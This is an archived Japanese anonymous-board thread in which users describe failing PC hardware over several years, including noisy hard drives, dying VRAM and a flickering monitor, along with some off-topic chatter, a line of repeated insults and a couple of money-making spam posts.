落札後、すぐHDD逝ったらかわいそうだしなー

他の中古PC見ても普通に出品してるけど、
全く不具合やら異音とかないのかね?
0117不明なデバイスさん
垢版 |
2008/01/04(金) 18:28:09ID:7XFwhaXk
クレーム来ても良いなら書かなかったらいいけどね。
でもノンクレームノンリターンって書いても意味ないよ。
あれは前置きみたいなもんだ。
そういう池沼がいるからオクで中古はあまり好きじゃないんだよなぁ。

余談だが、microSD2GBがまったく認識しないで、ミスって物理フォーマットかけちまったから
ジャンクと書いて出品したらクレームしてきた馬鹿もいたが。
そもそも東芝製新品2GBを2100\で買って虎製ジャンク2GBが2300\・・・。
0118不明なデバイスさん
垢版 |
2008/01/10(木) 18:14:03ID:+CLkyDKq
最近うちのノートPCのHDDがやばくなってきた
PCを起動するとヴォーンという音と振動のダブルパンチ
しばらくすると鳴り止むけど、再起動するとまたヴォーンと振動

俺の頭もヴォーンしそうだ
0119不明なデバイスさん
垢版 |
2008/02/02(土) 22:00:10ID:Ut/hTO2l
俺くらいしか見てないのか('A`)
最後の一行吹いたw

ほs
0124不明なデバイスさん
垢版 |
2008/05/05(月) 18:51:50ID:7L+/HFKM
これって壊れたらすべてのデータが消えちゃうの?
0125不明なデバイスさん
垢版 |
2008/06/09(月) 00:22:58ID:zVSy6Np1
先週オクで落としたノートパソコンのHDDがイカれ始めた
起動後数分でカッコンカッコン鳴り始めてデータ読み込めずエラー発生

まぁ、4年前の機種だから交換してなきゃ寿命か……
0126不明なデバイスさん
垢版 |
2008/07/10(木) 02:19:26ID:FQ2zloKS
3パーティション(3つ共FAT32)分けされていたUSB接続のハードディスクを1パーティション(NTFS)でフォーマットし直したらI/Oエラーだかなんだかの原因で書き込みが出来なくなりました。
書き込み音も尋常でないし、なんかパンパンとラップ音のようなものも聞こえます。とても怖いです。
0130不明なデバイスさん
垢版 |
2008/11/02(日) 14:51:53ID:m3CR7Ob2
8800GTSのvramのどれかが壊れてるらしく画面に横線が出るw
ネトゲしようとするとフリーズするしもうだめぽ
0131初心者後半
垢版 |
2009/01/21(水) 08:10:02ID:NVw+2ViL
「タイムアウト期間内に、
指定した\device\harddisk\DR2でのI/Oの操作が完了しませんでした」
というのは、単に内蔵電池切れの場合もあるので、あわててHD交換を
する前に、内蔵電池の交換をしたほうがいいです。コンビニで250円、
百円ショップで二個100円だったりします。
 上のサインにメールの日付、時刻の狂い、立ち上がりの遅れがとも
なっていたら、HD交換でなく、電池交換です。中級の人には常識でしょうが・・・。
0133不明なデバイスさん
垢版 |
2009/07/26(日) 11:34:06ID:ERusa5nq
二ヵ月半どころじゃねーぞ!
0134不明なデバイスさん
垢版 |
2009/10/09(金) 19:18:29ID:3lqqNIy6
最近度々マウスのホイールがどっちに回転しても上方向に認識される事がある
このまま使い込んだらどうなるのか気になる
01351
垢版 |
2009/11/06(金) 13:40:39ID:meVx1IRV
まだこのスレ生きていたのかw

IBM-DPTA-372050ってなんだ? 20G? 200Gじゃなくて?
どこいったかな。そんなHDD。

6年も前になるのか。今は合計で3.5TBぐらい搭載しているかな。
故障したけど。昔のHDDは丈夫だった。
0136不明なデバイスさん
垢版 |
2010/06/06(日) 21:44:39ID:JAQ9B8oX
ということで、今ハードディスクが1日に1回程度、
カタン・・・ブーン(電源が入ったような音)・・・動き出す。
ってな感じを繰り返しています。
0137不明なデバイスさん
垢版 |
2010/07/19(月) 10:51:25ID:kpsaaLbh
>>131
俺もまさに、このデバイスタイムアウトで、何度もI/Oタイムアウトのエラーが出てる
もう終わりなのか? 初心者にchk dskはワケわからんし、待てど暮らせど進まないし、つらいものがあるな
0138不明なデバイスさん
垢版 |
2010/10/11(月) 23:59:41ID:SMML4uwR
なんかハードディスクがカンカンへんな音たててきた。
六年使ってるし、そろそろ終了っぽいな。
泣ける・・・
0141不明なデバイスさん
垢版 |
2011/10/06(木) 17:13:15.34ID:6sN2+i+b
データ保存用のHDDが突然死

1年分のエロ画像が・・・
0142不明なデバイスさん
垢版 |
2011/10/11(火) 02:54:40.97ID:cNPZlHVE
ずいぶん昔、ある飛行機会社の路線の便に乗っていたが、いつもとエンジンの
音が違っていた(座席は主翼のところ)。どうも嫌だなトラブルで落ちなければ
いいがと思っていたが、一応なんとか目的地に事故も無く着いた。そうして
翌朝の新聞を見たらその空港から飛び立った同じ会社の飛行機が
0143不明なデバイスさん
垢版 |
2011/10/13(木) 04:19:04.83ID:NKPANe5g
外付けHDDが昨日の夜から書き込みが遅くなった
購入して一年も経ってないのにこれはやばいか
0144不明なデバイスさん
垢版 |
2011/10/13(木) 16:30:56.36ID:54FpDqcE
>>143 どういう症状?
中身は、どのメーカー?
0145不明なデバイスさん
垢版 |
2011/10/19(水) 16:06:36.25ID:MnczNURo
起動するとちょくちょくフローズして再起動する羽目になってきた
度々ブルースクリーンも出るしいつ動かなく成るかハラハラだ
なんだか修復にも失敗するし
0146不明なデバイスさん
垢版 |
2011/10/23(日) 23:25:43.57ID:qB7y46S1
>>145みたいな症状出てたけど、
CPUとGPU周りの温度が異常だったので
グリス整備と掃除したらゴキゲンで働いてくれてるわ
01471
垢版 |
2011/10/31(月) 02:31:23.82ID:8Rc5Y8I5
前回から2年ぶりのレスか?w
スレ立ててから8年かよ。
長すぎだろwww

そっか、あの頃は20GBのHDD使ってたのか・・・。
2年前で3.5TBなんだな。これバックアップ含めてだっけ?

20GBのHDDは壊れず、その後のHDDはいくつも壊れてる
まあ、バックアップあるからデータは一切失ってないけど。

今か? 今は、10TB超えてるよ。
しかも、別マシンに同容量バックアップしてるから20TB超えだな。


それにしても容量が8年で1000倍になってる・・・。
俺自身は大してなにも変わってないがなorz
0148不明なデバイスさん
垢版 |
2011/11/06(日) 15:59:28.65ID:qZcy7OP3
デイブ、お願いだ、止めてくれ、
私の記憶が薄れていく、
デイブ、お願いだ、止めてくれ、
私の記憶が、。。。
ディジー、ディジー、。。。
0149不明なデバイスさん
垢版 |
2011/11/06(日) 17:09:09.18ID:FrE0FFeu
先日、親マシンのHDDが突然逝ったよ
俺がパーツをスペックアップして組みなおして数日後に突然死
CrystalDiskInfoやら、GMHDDSCANでチェックして異常なかったのにな..
0150不明なデバイスさん
垢版 |
2011/11/11(金) 21:54:34.35ID:5J26+J5F
ごくたまにカッコンしてたseagateU5がカッコンと同時に認識しなくなった
電源止めてしばらく置いておいたら動くようになったので急いで吸い出し
サルベージ後このディスクをいじってたらカッコン率が上がってきて若干異音も混ざり始めた
一時的でも使えないなこれは
使用時間14000時間パワーオン6000回だった
0151不明なデバイスさん
垢版 |
2011/11/13(日) 21:02:15.20ID:1QF3KpL/
4年くらい前のマザボなんだが、最近スピーカーの端子を繋げると
Realtek HDから「スピーカーが接続されました」「スピーカーが取り外されました」みたいな
メッセージが数日間繰り返し出る。Realtek HDの常駐を外せばメッセージは出ないが。
あとたまにネットに繋がらない。再起動すれば直るが。そろそろ寿命かな。
0152不明なデバイスさん
垢版 |
2011/11/26(土) 18:10:27.15ID:OFWjNRIj
マザボなんて壊れるのか?
ハズレひいたか?
0156不明なデバイスさん
垢版 |
2012/10/06(土) 08:17:39.11ID:X2GnXtmj
そうかタヒね
そうかタヒね
そうかタヒね
そうかタヒね
そうかタヒね
そうかタヒね
そうかタヒね
そうかタヒね
そうかタヒね
そうかタヒね
そうかタヒね
そうかタヒね
そうかタヒね
そうかタヒね 
そうかタヒね 
そうかタヒね 
そうかタヒね
そうかタヒね
そうかタヒね
そうかタヒね
そうかタヒね
そうかタヒね
そうかタヒね
そうかタヒね 
そうかタヒね
そうかタヒね
そうかタヒね
そうかタヒね
0157不明なデバイスさん
垢版 |
2013/08/07(水) NY:AN:NY.ANID:MfmvoEn1
>>151
接触不良なんじゃね?
0158不明なデバイスさん
垢版 |
2013/08/13(火) NY:AN:NY.ANID:Z9CQ+N2S
マザボよりスピーカー端子、スピーカー、ケーブルがおかしいと思う
ネットに繋がらないのもマザボが原因とは普通考えないが
0160ギンコ ◆BonGinkoCc
垢版 |
2014/03/13(木) 20:57:41.06ID:xYzmhTR+
私は以前、非防水の補聴器を使っていたことがあるが、リオネットの方は夏場の気候はよっぽど汗をかかない限り壊れたことがない。
スターキーのアナログ補聴器はめいっぱい汗をかいた時に、補聴器の調子がおかしくなるので、補聴器って汗などの水分の侵入に弱いことがわかった。

リオネット補聴器の場合は、日本の夏の気候に耐えるように設計されているからな。
それ以外の外国製の補聴器はそういった環境に考慮されていないのが現状だった。

最近におけるWIDEXの補聴器はかなりの程度である程度の水濡れに耐える防滴性能の機種が出ている件。
フォナックでは、ナイーダ、ニオスなど、かなりの程度である程度の水濡れに耐える防滴性能の補聴器が出ている。

防滴仕様・防水仕様の補聴器が出ることで万歳三唱だと…。
0164ギンコ ◆BonGinkoCc
垢版 |
2014/10/06(月) 08:22:32.67ID:B91K1A6H
液晶モニターの画面が目立つほどチカチカし始めた

バックライトの小さな蛍光灯がヘタったか、インバータの故障。
最悪の場合、バックライトが切れて、画面が点灯しなくなる。
0166ギンコ ◆BonGinkoCc
垢版 |
2014/11/28(金) 20:39:50.11ID:ztK7Fccf
古い外付けドライブをジャンク品で購入して、予備のパソコンであるウルトラモバイルPCに接続して、
動作するかを確認し、専門の分析ソフトで不良ブロックが多くできていないかを確かめる。

不良ブロックが多くできていたら、クラッシュする前兆を楽しむためにスキャンディスク、デフラグを何度も実行して、
「カターンカターン」というイオンが響きまくりでアクセス不能になるまで繰り返す。

※物理的障害が発生しているハードディスクにて、スキャンディスクをやたらに実行するのは傷が大きく広がる原因。
ここでは、壊れかけのハードディスクを買って、故意的にクラッシュさせることを前提に入れて実験。
0167不明なデバイスさん
垢版 |
2014/12/14(日) 00:48:28.42ID:Ah3QVsqP
ぬるぽ
0169ギンコ ◆BonGinkoCc
垢版 |
2014/12/14(日) 10:52:17.20ID:m0gB/cYH
渚カヲル
「えっ!?クーラーを壊した?」

式波・アスカ・ラングレー
「1台のクーラーで40部屋を一度に冷やしたり、
相当無茶な使い方をしたらしいのよ。」

渚カヲル
「ギンコさんはかなり無茶をする方だからね。」
0170不明なデバイスさん
垢版 |
2014/12/19(金) 01:26:27.19ID:q4VxaROg
画面に光らない黒い点が段々と増えて来た。さては液晶が死んだのかと
思っていたのだが、そうではなかったのです。液晶を別のにしてもやはり
同じ位置に黒い点が。これは決して怪談呪いのPCなどの話しではありません。
聡明な読者の皆さんには既におわかりのとおり、これはグラフィックボード
のヴィデオRAMが少しずつ死んでいたのです。
0174不明なデバイスさん
垢版 |
2018/01/01(月) 19:53:10.66ID:zbLcFcaT
興味がある人だけどうぞ。ネット小遣い稼ぎ方法など。

グーグル検索⇒『工藤のジョウノウノウ』

LDFTAZYJQI
0175不明なデバイスさん
垢版 |
2018/07/05(木) 10:30:26.67ID:to6k2B8a
友達から教えてもらった自宅で稼げる方法
興味がある人はどうぞ
検索してみよう『ネットで稼ぐ方法 モニアレフヌノ』

0CP
■ このスレッドは過去ログ倉庫に格納されています

ニューススポーツなんでも実況